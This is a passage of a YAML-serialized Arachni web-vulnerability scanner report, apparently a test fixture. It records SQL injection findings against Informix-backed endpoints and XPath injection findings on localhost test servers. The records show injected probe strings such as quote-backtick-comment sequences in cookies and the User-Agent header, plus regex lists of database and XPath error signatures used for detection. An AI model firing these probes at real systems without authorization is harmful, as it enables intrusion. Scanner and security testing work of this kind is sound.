'["An illegal character has been found in the statement\ncom.informix.jdbc\nException stuff Informix\n", nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTA4 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNTo1MiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/informix/cookie/flip elem: cookie method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:com\.informix\.jdbc) :match: com.informix.jdbc :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ) :altered: Parameter flip :element: cookie :params: {} :follow_location: true :cookies: ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :injected: '' :combo: ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/informix/cookie/flip :verification: :id: com.informix.jdbc var: Parameter flip url: http://localhost:7362/informix/cookie/flip injected: '' id: com.informix.jdbc regexp: (?i-mx:com\.informix\.jdbc) regexp_match: com.informix.jdbc elem: cookie remarks: :stuff: - Blah - Blah2 method: GET response: ! 
'[nil, "An illegal character has been found in the statement\ncom.informix.jdbc\nException stuff Informix\n"]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;)=95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTA4 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNTo1NCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: cookie2 url: http://localhost:7362/informix/cookie/append elem: cookie method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:com\.informix\.jdbc) :match: com.informix.jdbc :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! '''`--' :altered: !binary |- Y29va2llMg== :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2llMg==": cookie value'`-- :injected: cookie value'`-- :combo: !binary "Y29va2llMg==": cookie value'`-- :action: http://localhost:7362/informix/cookie/append :verification: :id: com.informix.jdbc var: cookie2 url: http://localhost:7362/informix/cookie/append injected: cookie value'`-- id: com.informix.jdbc regexp: (?i-mx:com\.informix\.jdbc) regexp_match: com.informix.jdbc elem: cookie remarks: {} method: GET response: ! 
'An illegal character has been found in the statement com.informix.jdbc Exception stuff Informix ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value'`-- response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OTY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNTo1NCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: User-Agent url: http://localhost:7362/informix/header/append elem: header method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:com\.informix\.jdbc) :match: com.informix.jdbc :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! '''`--' :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: arachni_user'`-- :injected: arachni_user'`-- :combo: User-Agent: arachni_user'`-- :action: http://localhost:7362/informix/header/append :verification: :id: com.informix.jdbc var: User-Agent url: http://localhost:7362/informix/header/append injected: arachni_user'`-- id: com.informix.jdbc regexp: (?i-mx:com\.informix\.jdbc) regexp_match: com.informix.jdbc elem: header remarks: {} method: GET response: ! 
'An illegal character has been found in the statement com.informix.jdbc Exception stuff Informix ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: arachni_user'`-- Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OTY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNjowNSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/informix/header/flip elem: header method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:com\.informix\.jdbc) :match: com.informix.jdbc :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! '''`--' :altered: Parameter flip :element: header :params: :follow_location: true :headers: ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :injected: '' :combo: ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/informix/header/flip :verification: :id: com.informix.jdbc var: Parameter flip url: http://localhost:7362/informix/header/flip injected: '' id: com.informix.jdbc regexp: (?i-mx:com\.informix\.jdbc) regexp_match: com.informix.jdbc elem: header remarks: {} method: GET response: ! '[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, "An illegal character has been found in the statement\ncom.informix.jdbc\nException stuff Informix\n", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev ! 
'''`--': 95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjUz !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNjoxMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/XPATH_Injection var: input url: http://localhost:13111/general/form/append elem: form method: GET name: XPath Injection description: XPath queries can be injected into the web application. tags: - xpath - database - error - injection - regexp cwe: '91' cwe_url: http://cwe.mitre.org/data/definitions/91.html severity: High remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
mod_name: XPath Injection variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/XPATH_Injection opts: :redundant: false :async: true :regexp: !binary |- QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4= :match: !binary |- QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4= :substring: - !binary |- eG1sWFBhdGhFdmFsOiBldmFsdWF0aW9uIGZhaWxlZA== - !binary |- U2ltcGxlWE1MRWxlbWVudDo6eHBhdGgoKQ== - !binary |- WFBhdGhFeGNlcHRpb24= - !binary |- TVMuSW50ZXJuYWwuWG1sLg== - !binary |- VW5rbm93biBlcnJvciBpbiBYUGF0aA== - !binary |- b3JnLmFwYWNoZS54cGF0aC5YUGF0aA== - !binary |- QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4= - !binary |- QW4gb3BlcmFuZCBpbiBVbmlvbiBFeHByZXNzaW9uIGRvZXMgbm90IHByb2R1 Y2UgYSBub2RlLXNldA== - !binary |- Q2Fubm90IGNvbnZlcnQgZXhwcmVzc2lvbiB0byBhIG51bWJlcg== - !binary |- RG9jdW1lbnQgQXhpcyBkb2VzIG5vdCBhbGxvdyBhbnkgY29udGV4dCBMb2Nh dGlvbiBTdGVwcw== - !binary |- RW1wdHkgUGF0aCBFeHByZXNzaW9u - !binary |- RW1wdHkgUmVsYXRpdmUgTG9jYXRpb24gUGF0aA== - !binary |- RW1wdHkgVW5pb24gRXhwcmVzc2lvbg== - !binary |- RXhwZWN0ZWQgJyknIGlu - !binary |- RXhwZWN0ZWQgbm9kZSB0ZXN0IG9yIG5hbWUgc3BlY2lmaWNhdGlvbiBhZnRl ciBheGlzIG9wZXJhdG9y - !binary |- SW5jb21wYXRpYmxlIFhQYXRoIGtleQ== - !binary |- SW5jb3JyZWN0IFZhcmlhYmxlIEJpbmRpbmc= - !binary |- bGlieG1sMiBsaWJyYXJ5IGZ1bmN0aW9uIGZhaWxlZA== - !binary |- eG1sc2VjIGxpYnJhcnkgZnVuY3Rpb24= - !binary |- ZXJyb3IgJzgwMDA0MDA1Jw== - !binary |- QSBkb2N1bWVudCBtdXN0IGNvbnRhaW4gZXhhY3RseSBvbmUgcm9vdCBlbGVt ZW50Lg== - !binary |- RXhwcmVzc2lvbiBtdXN0IGV2YWx1YXRlIHRvIGEgbm9kZS1zZXQu - !binary |- RXhwZWN0ZWQgdG9rZW4gJ10n - !binary |- PHA+bXN4bWw0LmRsbDwvZm9udD4= - !binary |- PHA+bXN4bWwzLmRsbDwvZm9udD4= :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! 
'''"' :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": default'" :follow_location: true :injected: default'" :combo: !binary "aW5wdXQ=": default'" :action: http://localhost:13111/general/form/append :verification: false :id: !binary |- QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4= var: input url: http://localhost:13111/general/form/append injected: default'" id: A closing bracket expected in regexp: A closing bracket expected in regexp_match: A closing bracket expected in elem: form remarks: {} method: GET response: ! 'A closing bracket expected in An operand in Union Expression does not produce a node-set Cannot convert expression to a number Document Axis does not allow any context Location Steps Empty Path Expression Empty Relative Location Path Empty Union Expression Expected '')'' in Expected node test or name specification after axis operator Incompatible XPath key Incorrect Variable Binding A document must contain exactly one root element. Expected token '']'' ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NDUz !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNjo0NiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: XPath Injection description: XPath queries can be injected into the web application. tags: - xpath - database - error - injection - regexp cwe: '91' cwe_url: http://cwe.mitre.org/data/definitions/91.html severity: High remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." mod_name: XPath Injection variations: [] internal_modname: XPathInjection internal_modname: XPathInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/XPATH_Injection var: input url: http://localhost:13111/general/link/append?input=default elem: link method: GET name: XPath Injection description: XPath queries can be injected into the web application. tags: - xpath - database - error - injection - regexp cwe: '91' cwe_url: http://cwe.mitre.org/data/definitions/91.html severity: High remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." mod_name: XPath Injection variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/XPATH_Injection opts: :redundant: false :async: true :regexp: !binary |- QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4= :match: !binary |- QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4= :substring: - !binary |- eG1sWFBhdGhFdmFsOiBldmFsdWF0aW9uIGZhaWxlZA== - !binary |- U2ltcGxlWE1MRWxlbWVudDo6eHBhdGgoKQ== - !binary |- WFBhdGhFeGNlcHRpb24= - !binary |- TVMuSW50ZXJuYWwuWG1sLg== - !binary |- VW5rbm93biBlcnJvciBpbiBYUGF0aA== - !binary |- b3JnLmFwYWNoZS54cGF0aC5YUGF0aA== - !binary |- QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4= - !binary |- QW4gb3BlcmFuZCBpbiBVbmlvbiBFeHByZXNzaW9uIGRvZXMgbm90IHByb2R1 Y2UgYSBub2RlLXNldA== - !binary |- Q2Fubm90IGNvbnZlcnQgZXhwcmVzc2lvbiB0byBhIG51bWJlcg== - !binary |- RG9jdW1lbnQgQXhpcyBkb2VzIG5vdCBhbGxvdyBhbnkgY29udGV4dCBMb2Nh dGlvbiBTdGVwcw== - !binary |- RW1wdHkgUGF0aCBFeHByZXNzaW9u - !binary |- RW1wdHkgUmVsYXRpdmUgTG9jYXRpb24gUGF0aA== - !binary |- RW1wdHkgVW5pb24gRXhwcmVzc2lvbg== - !binary |- RXhwZWN0ZWQgJyknIGlu - !binary |- RXhwZWN0ZWQgbm9kZSB0ZXN0IG9yIG5hbWUgc3BlY2lmaWNhdGlvbiBhZnRl ciBheGlzIG9wZXJhdG9y - !binary |- SW5jb21wYXRpYmxlIFhQYXRoIGtleQ== - !binary |- 
SW5jb3JyZWN0IFZhcmlhYmxlIEJpbmRpbmc= - !binary |- bGlieG1sMiBsaWJyYXJ5IGZ1bmN0aW9uIGZhaWxlZA== - !binary |- eG1sc2VjIGxpYnJhcnkgZnVuY3Rpb24= - !binary |- ZXJyb3IgJzgwMDA0MDA1Jw== - !binary |- QSBkb2N1bWVudCBtdXN0IGNvbnRhaW4gZXhhY3RseSBvbmUgcm9vdCBlbGVt ZW50Lg== - !binary |- RXhwcmVzc2lvbiBtdXN0IGV2YWx1YXRlIHRvIGEgbm9kZS1zZXQu - !binary |- RXhwZWN0ZWQgdG9rZW4gJ10n - !binary |- PHA+bXN4bWw0LmRsbDwvZm9udD4= - !binary |- PHA+bXN4bWwzLmRsbDwvZm9udD4= :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! ']]]]]]]]]' :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": default]]]]]]]]] :follow_location: true :injected: default]]]]]]]]] :combo: !binary "aW5wdXQ=": default]]]]]]]]] :action: http://localhost:13111/general/link/append?input=default :verification: false :id: !binary |- QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4= var: input url: http://localhost:13111/general/link/append?input=default injected: default]]]]]]]]] id: A closing bracket expected in regexp: A closing bracket expected in regexp_match: A closing bracket expected in elem: link remarks: {} method: GET response: ! 'A closing bracket expected in An operand in Union Expression does not produce a node-set Cannot convert expression to a number Document Axis does not allow any context Location Steps Empty Path Expression Empty Relative Location Path Empty Union Expression Expected '')'' in Expected node test or name specification after axis operator Incompatible XPath key Incorrect Variable Binding A document must contain exactly one root element. 
Expected token '']'' ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NDUz !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNjo0NyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: XPath Injection description: XPath queries can be injected into the web application. tags: - xpath - database - error - injection - regexp cwe: '91' cwe_url: http://cwe.mitre.org/data/definitions/91.html severity: High remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." mod_name: XPath Injection variations: [] internal_modname: XPathInjection internal_modname: XPathInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/XPATH_Injection var: cookie2 url: http://localhost:13111/general/cookie/append elem: cookie method: GET name: XPath Injection description: XPath queries can be injected into the web application. tags: - xpath - database - error - injection - regexp cwe: '91' cwe_url: http://cwe.mitre.org/data/definitions/91.html severity: High remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
mod_name: XPath Injection variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/XPATH_Injection opts: :redundant: false :async: true :regexp: !binary |- QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4= :match: !binary |- QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4= :substring: - !binary |- eG1sWFBhdGhFdmFsOiBldmFsdWF0aW9uIGZhaWxlZA== - !binary |- U2ltcGxlWE1MRWxlbWVudDo6eHBhdGgoKQ== - !binary |- WFBhdGhFeGNlcHRpb24= - !binary |- TVMuSW50ZXJuYWwuWG1sLg== - !binary |- VW5rbm93biBlcnJvciBpbiBYUGF0aA== - !binary |- b3JnLmFwYWNoZS54cGF0aC5YUGF0aA== - !binary |- QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4= - !binary |- QW4gb3BlcmFuZCBpbiBVbmlvbiBFeHByZXNzaW9uIGRvZXMgbm90IHByb2R1 Y2UgYSBub2RlLXNldA== - !binary |- Q2Fubm90IGNvbnZlcnQgZXhwcmVzc2lvbiB0byBhIG51bWJlcg== - !binary |- RG9jdW1lbnQgQXhpcyBkb2VzIG5vdCBhbGxvdyBhbnkgY29udGV4dCBMb2Nh dGlvbiBTdGVwcw== - !binary |- RW1wdHkgUGF0aCBFeHByZXNzaW9u - !binary |- RW1wdHkgUmVsYXRpdmUgTG9jYXRpb24gUGF0aA== - !binary |- RW1wdHkgVW5pb24gRXhwcmVzc2lvbg== - !binary |- RXhwZWN0ZWQgJyknIGlu - !binary |- RXhwZWN0ZWQgbm9kZSB0ZXN0IG9yIG5hbWUgc3BlY2lmaWNhdGlvbiBhZnRl ciBheGlzIG9wZXJhdG9y - !binary |- SW5jb21wYXRpYmxlIFhQYXRoIGtleQ== - !binary |- SW5jb3JyZWN0IFZhcmlhYmxlIEJpbmRpbmc= - !binary |- bGlieG1sMiBsaWJyYXJ5IGZ1bmN0aW9uIGZhaWxlZA== - !binary |- eG1sc2VjIGxpYnJhcnkgZnVuY3Rpb24= - !binary |- ZXJyb3IgJzgwMDA0MDA1Jw== - !binary |- QSBkb2N1bWVudCBtdXN0IGNvbnRhaW4gZXhhY3RseSBvbmUgcm9vdCBlbGVt ZW50Lg== - !binary |- RXhwcmVzc2lvbiBtdXN0IGV2YWx1YXRlIHRvIGEgbm9kZS1zZXQu - !binary |- RXhwZWN0ZWQgdG9rZW4gJ10n - !binary |- PHA+bXN4bWw0LmRsbDwvZm9udD4= - !binary |- PHA+bXN4bWwzLmRsbDwvZm9udD4= :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! 
'''"' :altered: !binary |- Y29va2llMg== :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2llMg==": cookie value'" :injected: cookie value'" :combo: !binary "Y29va2llMg==": cookie value'" :action: http://localhost:13111/general/cookie/append :verification: false :id: !binary |- QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4= var: cookie2 url: http://localhost:13111/general/cookie/append injected: cookie value'" id: A closing bracket expected in regexp: A closing bracket expected in regexp_match: A closing bracket expected in elem: cookie remarks: {} method: GET response: ! 'A closing bracket expected in An operand in Union Expression does not produce a node-set Cannot convert expression to a number Document Axis does not allow any context Location Steps Empty Path Expression Empty Relative Location Path Empty Union Expression Expected '')'' in Expected node test or name specification after axis operator Incompatible XPath key Incorrect Variable Binding A document must contain exactly one root element. Expected token '']'' ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value'" response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary 